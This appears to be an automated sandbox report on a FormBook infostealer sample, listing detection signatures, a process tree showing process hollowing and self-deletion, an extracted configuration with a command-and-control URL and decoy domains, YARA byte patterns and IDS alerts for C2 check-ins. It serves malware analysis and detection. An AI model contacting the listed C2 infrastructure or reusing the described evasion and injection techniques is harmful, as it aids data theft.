Edit tour

Windows Analysis Report
GCeHcfCef8.exe

Overview

General Information

Sample Name:	GCeHcfCef8.exe
Original Sample Name:	841031a37159398b8eebca7bb7eff56b.exe
Analysis ID:	1331069
MD5:	841031a37159398b8eebca7bb7eff56b
SHA1:	1848cf9917341a151a4cd8c3ff041525a4d075eb
SHA256:	0ad9757a6895b3595b4eaa5a71cca88d658a1c21f335b8d3268949d659e27fda
Tags:	32exetrojan
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Machine Learning detection for sample

Modifies the prolog of user mode functions (user mode inline hooks)

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

.NET source code contains method to dynamically call methods (often used by packers)

Queues an APC in another process (thread injection)

.NET source code contains very large array initializations

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

GCeHcfCef8.exe (PID: 6280 cmdline: C:\Users\user\Desktop\GCeHcfCef8.exe MD5: 841031A37159398B8EEBCA7BB7EFF56B)

GCeHcfCef8.exe (PID: 7052 cmdline: C:\Users\user\Desktop\GCeHcfCef8.exe MD5: 841031A37159398B8EEBCA7BB7EFF56B)

explorer.exe (PID: 2592 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cmmon32.exe (PID: 5656 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: DEC326E5B4D23503EA5176878DDDB683)

cmd.exe (PID: 6380 cmdline: /c del "C:\Users\user\Desktop\GCeHcfCef8.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nightoracle.com/rs10/"], "decoy": ["starryallure.com", "mania-31.online", "baba-bt-top1.buzz", "jwilkinsartscapeinc.com", "tallerhazop.com", "lulu013.com", "pontoimediato.com", "stmc-company.com", "thesoftwarepractitioner.com", "makemoneywithsherrie.com", "algaroba.com", "smartbookmarks.info", "burneysaw.com", "fftsxxx.top", "hvr998.com", "sofisticars.store", "clickit.fun", "couches-sofas-16683.bond", "ikkasolutions.com", "oakvisa.com", "totalkfood.com", "guillaumecarreau.com", "biomagnetismocolombia.com", "jrszhiboz.com", "rewmio.xyz", "willowliy.com", "calm-plants.com", "robertjamesfineclothing.com", "wgardsgm.live", "dngbdk9jpusxpwr.com", "slycepicklegear.com", "mtauratarnt.com", "simolified.com", "mekkamochi.com", "deeprootedleader.com", "container-houses-vn.click", "roundaboutlogistics.com", "m-baer.com", "electric-cars-19095.bond", "destinydinos.com", "taxretentionstrategiesgroup.com", "zg9tywlubmftzw5ldzi0mdm.com", "cleaning-products-29334.bond", "metaastrologia.com", "practicaloutsource.com", "w1nb74.top", "just-one.info", "cryptarrow.com", "omarshafie.online", "latitudeinformatics.com", "fhstbanknigeria.com", "hdlive7.live", "laserhairremovalkit.com", "into-org.com", "kzjsm.com", "juara102-azura.com", "digitsum.com", "cabins-prefab.online", "allisonparlinart.com", "cpsgrantstream.com", "everythingbutthetruck.com", "w6k3v.com", "alfarizkigrup.com", "gs3ekdj3ixe.asia"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x7a2c9:$a1: 3C 30 50 4F 53 54 74 09 40 0xa88e9:$a1: 3C 30 50 4F 53 54 74 09 40 0xd5f09:$a1: 3C 30 50 4F 53 54 74 09 40 0x90c38:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xbf258:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xec878:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7ea47:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xad067:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xda687:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x8992f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xb7f4f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xe556f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7d980:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7dbfa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xabfa0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xac21a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd95c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd983a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb7d4d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe536d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x89219:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb7839:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe4e59:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x8982f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb7e4f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe546f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x899a7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb7fc7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe55e7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7e612:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xacc32:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xda252:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x8c8c1:$sqlite3step: 68 34 1C 7B E1 0x8c9d4:$sqlite3step: 68 34 1C 7B E1 0xbaee1:$sqlite3step: 68 34 1C 7B E1 0xbaff4:$sqlite3step: 68 34 1C 7B E1 0xe8501:$sqlite3step: 68 34 1C 7B E1 0xe8614:$sqlite3step: 68 34 1C 7B E1 0x8c8f0:$sqlite3text: 68 38 2A 90 C5 0x8ca15:$sqlite3text: 68 38 2A 90 C5 0xbaf10:$sqlite3text: 68 38 2A 90 C5 0xbb035:$sqlite3text: 68 38 2A 90 C5 0xe8530:$sqlite3text: 68 38 2A 90 C5 0xe8655:$sqlite3text: 68 38 2A 90 C5 0x8c903:$sqlite3blob: 68 53 D8 7F 8C 0x8ca2b:$sqlite3blob: 68 53 D8 7F 8C 0xbaf23:$sqlite3blob: 68 53 D8 7F 8C 0xbb04b:$sqlite3blob: 68 53 D8 7F 8C 0xe8543:$sqlite3blob: 68 53 D8 7F 8C 0xe866b:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: GCeHcfCef8.exe PID: 6280	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: GCeHcfCef8.exe PID: 6280	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1173e:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: GCeHcfCef8.exe PID: 7052	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x39f10:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: cmmon32.exe PID: 5656	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1636:$a1: 3C 30 50 4F 53 54 74 09 40 0x64f3f:$a1: 3C 30 50 4F 53 54 74 09 40 0x123524:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 24 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.GCeHcfCef8.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.GCeHcfCef8.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.GCeHcfCef8.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.GCeHcfCef8.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.GCeHcfCef8.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
2.2.GCeHcfCef8.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.GCeHcfCef8.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.GCeHcfCef8.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.GCeHcfCef8.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.GCeHcfCef8.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.11 - Destination IP: 35.186.223.180

Timestamp:	192.168.2.1135.186.223.18049714802031412 10/24/23-08:28:29.857367
SID:	2031412
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.11 - Destination IP: 104.19.157.23

Timestamp:	192.168.2.11104.19.157.2349717802031412 10/24/23-08:29:30.721718
SID:	2031412
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.11 - Destination IP: 23.227.38.74

Timestamp:	192.168.2.1123.227.38.7449718802031412 10/24/23-08:29:51.038616
SID:	2031412
Source Port:	49718
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.11 - Destination IP: 3.33.130.190

Timestamp:	192.168.2.113.33.130.19049716802031412 10/24/23-08:29:11.748633
SID:	2031412
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.11 - Destination IP: 104.247.82.51

Timestamp:	192.168.2.11104.247.82.5149723802031412 10/24/23-08:31:16.668472
SID:	2031412
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.11 - Destination IP: 103.224.212.212

Timestamp:	192.168.2.11103.224.212.21249713802031412 10/24/23-08:28:09.457640
SID:	2031412
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.11 - Destination IP: 103.224.212.210

Timestamp:	192.168.2.11103.224.212.21049721802031412 10/24/23-08:30:33.279150
SID:	2031412
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.11 - Destination IP: 104.21.69.174

Timestamp:	192.168.2.11104.21.69.17449722802031412 10/24/23-08:30:53.443055
SID:	2031412
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.nightoracle.com/rs10/"], "decoy": ["starryallure.com", "mania-31.online", "baba-bt-top1.buzz", "jwilkinsartscapeinc.com", "tallerhazop.com", "lulu013.com", "pontoimediato.com", "stmc-company.com", "thesoftwarepractitioner.com", "makemoneywithsherrie.com", "algaroba.com", "smartbookmarks.info", "burneysaw.com", "fftsxxx.top", "hvr998.com", "sofisticars.store", "clickit.fun", "couches-sofas-16683.bond", "ikkasolutions.com", "oakvisa.com", "totalkfood.com", "guillaumecarreau.com", "biomagnetismocolombia.com", "jrszhiboz.com", "rewmio.xyz", "willowliy.com", "calm-plants.com", "robertjamesfineclothing.com", "wgardsgm.live", "dngbdk9jpusxpwr.com", "slycepicklegear.com", "mtauratarnt.com", "simolified.com", "mekkamochi.com", "deeprootedleader.com", "container-houses-vn.click", "roundaboutlogistics.com", "m-baer.com", "electric-cars-19095.bond", "destinydinos.com", "taxretentionstrategiesgroup.com", "zg9tywlubmftzw5ldzi0mdm.com", "cleaning-products-29334.bond", "metaastrologia.com", "practicaloutsource.com", "w1nb74.top", "just-one.info", "cryptarrow.com", "omarshafie.online", "latitudeinformatics.com", "fhstbanknigeria.com", "hdlive7.live", "laserhairremovalkit.com", "into-org.com", "kzjsm.com", "juara102-azura.com", "digitsum.com", "cabins-prefab.online", "allisonparlinart.com", "cpsgrantstream.com", "everythingbutthetruck.com", "w6k3v.com", "alfarizkigrup.com", "gs3ekdj3ixe.asia"]}

Multi AV Scanner detection for submitted file

Source: GCeHcfCef8.exe	ReversingLabs: Detection: 45%
Source: GCeHcfCef8.exe	Virustotal: Detection: 55%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.GCeHcfCef8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.GCeHcfCef8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3791675390.0000000002680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3793711799.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1345322177.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3790265630.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

